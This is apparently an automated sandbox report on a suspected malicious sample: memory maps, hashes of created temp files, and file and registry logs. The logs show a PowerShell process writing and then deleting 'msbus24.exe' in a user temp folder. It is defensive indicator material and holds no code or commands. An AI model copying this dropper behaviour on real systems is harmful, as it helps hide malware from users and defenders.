system.ni.dll	0x7fee7540000	0x7fee7f62fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x7fee7f70000	0x7fee8e4bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x7fee8e50000	0x7fee97ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x7feea670000	0x7feea6d8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x7fef3ca0000	0x7fef3cd1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x7fef3dd0000	0x7fef3e81fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fef44c0000	0x7fef4558fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef4570000	0x7fef45defff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x7fef4a60000	0x7fef4a66fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x7fef8d60000	0x7fef8d6bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x7fef8d70000	0x7fef8da3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x7fef94a0000	0x7fef951ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x7fef9580000	0x7fef958efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x7fefa6d0000	0x7fefa726fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x7fefb310000	0x7fefb31afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x7fefb340000	0x7fefb358fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x7fefb7f0000	0x7fefb81cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefc0c0000	0x7fefc115fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x7fefc120000	0x7fefc24bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7fefc2a0000	0x7fefc493fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc930000	0x7fefc93bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x7fefcb10000	0x7fefcb2dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefcd60000	0x7fefcda6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefd060000	0x7fefd076fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x7fefd560000	0x7fefd582fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefd6a0000	0x7fefd6aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x7fefd770000	0x7fefd77efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x7fefd900000	0x7fefd935fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd940000	0x7fefd9aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x7fefdb20000	0x7fefdb39fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefdb40000	0x7fefdbdefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefdbe0000	0x7fefdc78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe060000	0x7fefe0c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefe0d0000	0x7fefe1d8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7fefe280000	0x7fefe356fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x7fefe360000	0x7fefe536fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefe550000	0x7fefe55dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7fefe560000	0x7fefe5d0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefe5e0000	0x7fefe7e2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe870000	0x7fefe89dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7fefe8a0000	0x7fefe8befff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefe8c0000	0x7fefe988fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefe9b0000	0x7fefeadcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x7fefeae0000	0x7feff867fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7feff870000	0x7feff94afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x7feffad0000	0x7feffb21fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feffb40000	0x7feffb40fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007ff00010000	0x7ff00010000	0x7ff0001ffff	Private Memory		Region Actions
private_0x000007ff00020000	0x7ff00020000	0x7ff0002ffff	Private Memory		Region Actions
private_0x000007ff00030000	0x7ff00030000	0x7ff000cffff	Private Memory		Region Actions
private_0x000007ff000d0000	0x7ff000d0000	0x7ff000dffff	Private Memory		Region Actions
private_0x000007ff000e0000	0x7ff000e0000	0x7ff0014ffff	Private Memory		Region Actions
private_0x000007ff00150000	0x7ff00150000	0x7ff0015ffff	Private Memory		Region Actions
private_0x000007ff00160000	0x7ff00160000	0x7ff0016ffff	Private Memory		Region Actions
private_0x000007ff00170000	0x7ff00170000	0x7ff0017ffff	Private Memory		Region Actions
private_0x000007ff00180000	0x7ff00180000	0x7ff0018ffff	Private Memory		Region Actions
private_0x000007ff00190000	0x7ff00190000	0x7ff0019ffff	Private Memory		Region Actions
private_0x000007fffff10000	0x7fffff10000	0x7fffff1ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000007fffff20000	0x7fffff20000	0x7fffffaffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd3fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd4000	0x7fffffd4000	0x7fffffd5fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd8000	0x7fffffd8000	0x7fffffd9fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffda000	0x7fffffda000	0x7fffffdbfff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffddfff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions
For performance reasons, the remaining 80 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	Actions
c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\hjrd1k~1\appdata\local\temp\tar1dfc.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\hjrd1k~1\appdata\local\temp\cab1e6a.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\hjrd1k~1\appdata\local\temp\tar1e6b.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\hjrd1k~1\appdata\local\temp\cab35d2.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\hjrd1k~1\appdata\local\temp\tar35d3.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\hjrd1koky ds8lujv\appdata\local\temp\msbus24.exe	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp	51.38 KB (52608 bytes)	MD5: ff9672cd98bf5d41722d2d1207344c67 SHA1: 98ebe6d49d1d9d4add4bf9219fe2ded40cba33f3 SHA256: 756f4d557302e49bce6623db9bd324c7b05c36b8bb884bbefbbe6b7f53422a54	File Actions Show Properties Download
c:\users\hjrd1k~1\appdata\local\temp\cab1e6a.tmp	51.38 KB (52608 bytes)	MD5: ff9672cd98bf5d41722d2d1207344c67 SHA1: 98ebe6d49d1d9d4add4bf9219fe2ded40cba33f3 SHA256: 756f4d557302e49bce6623db9bd324c7b05c36b8bb884bbefbbe6b7f53422a54	File Actions Show Properties Download
c:\users\hjrd1k~1\appdata\local\temp\tar1dfc.tmp	122.35 KB (125286 bytes)	MD5: 8237156ad13c2cd7c5cc2faa6969fd86 SHA1: e5481457795650900ee04db955c87224e2db32f0 SHA256: 1a9094d2695f9bfbbf047639227e94f9e838cb0bee18e14b1aed00054faef825	File Actions Show Properties Download
c:\users\hjrd1k~1\appdata\local\temp\tar1e6b.tmp	122.35 KB (125286 bytes)	MD5: 8237156ad13c2cd7c5cc2faa6969fd86 SHA1: e5481457795650900ee04db955c87224e2db32f0 SHA256: 1a9094d2695f9bfbbf047639227e94f9e838cb0bee18e14b1aed00054faef825	File Actions Show Properties Download
c:\users\hjrd1k~1\appdata\local\temp\cab35d2.tmp	51.73 KB (52967 bytes)	MD5: 26763abb95381e4931c194e34023c33a SHA1: e1b8114caa3a6b173c2e04e356a5065e7b2ca968 SHA256: 49f2686e30a59fabf11db1234c377497cf09e941ff50a0346854d087e8b08587	File Actions Show Properties Download
c:\users\hjrd1k~1\appdata\local\temp\tar35d3.tmp	123.21 KB (126167 bytes)	MD5: 0dab7711a89d642ffe6ea216d92e56c1 SHA1: f2295d85679189d4fc1aac7c761be81447299ec5 SHA256: 163a6d7aaf9374ae4f1b4ee744a906b68da772aaa22095b4ecae709fb6d889e5	File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015	0.34 KB (344 bytes)	MD5: 96b91c3aa1e304f9f1e5330e1ced1f15 SHA1: fdd22e500e3d7d3f9464de971449d31789c26f8f SHA256: 3e9741fc1d84a8d2fdbb3d58512b1729d75ce116711fc664f6bf52642e433d3d		File Actions Show Properties Download
c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015	0.34 KB (344 bytes)	MD5: 0134df8e2b4d52d156721c444cf96cb5 SHA1: 528e03a25cbd2530d36bea604c4558b239e01c31 SHA256: 0581e2081709fc97843a4ed093c4de023a971ff449492d41239895b30a387b14		File Actions Show Properties Download

Host Behavior

File (407)

Operation	Filename	Additional Information	Count	Logfile
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\msbus24.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	7	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	7	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	7	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	7	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	7	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	7	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	7	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	6	Fn
Get Info			2	Fn
Get Info			3	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml		2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml		2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml		2	Fn
Get Info			5	Fn
Get Info			6	Fn
Get Info			7	Fn
Get Info			4	Fn
Get Info			1	Fn
Get Info			1	Fn
Get Info			1	Fn
Get Info			1	Fn
Get Info			2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config		2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	size_out = 0	1	Fn
Get Info	C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\msbus24.exe		2	Fn
Open	STD_INPUT_HANDLE		1	Fn
Open	STD_ERROR_HANDLE		1	Fn
Open	STD_OUTPUT_HANDLE		1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 4096	3	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 3315	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 781, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 4096	41	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 436	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 2530	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 542, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 4096	5	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 4018	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 78, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	size = 4096, size_out = 2762	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	size = 310, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 4096	17	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 3022	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 50, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 281	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 4096	62	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 3895	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 201, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 4096	21	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 3687	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 409, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 4096	4	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 2228	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 844, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 4096	4	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 3736	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 360, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 0	1	Fn Data
Read	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	size = 4096, size_out = 1459	1	Fn Data
Read	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	size = 4096, size_out = 0	1	Fn Data
Write	CONOUT$	size = 79	1	Fn Data
Write	CONOUT$	size = 1	1	Fn Data
Write	CONOUT$	size = 31	1	Fn Data
Write	CONOUT$	size = 1	1	Fn Data
Write	CONOUT$	size = 17	1	Fn Data
Write	CONOUT$	size = 1	1	Fn Data
Write	CONOUT$	size = 79	1	Fn Data
Write	CONOUT$	size = 1	1	Fn Data
Write	CONOUT$	size = 76	1	Fn Data
Write	CONOUT$	size = 1	1	Fn Data
Write	CONOUT$	size = 77	1	Fn Data
Write	CONOUT$	size = 1	1	Fn Data
Write	CONOUT$	size = 51	1	Fn Data
Write	CONOUT$	size = 1	1	Fn Data
Write	CONOUT$	size = 1	2	Fn Data
Delete	C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\msbus24.exe		1	Fn

Registry (211)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		1	Fn
Open Key	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment		1	Fn
Open Key	HKEY_CURRENT_USER\Environment		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell		2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		4	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		5	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
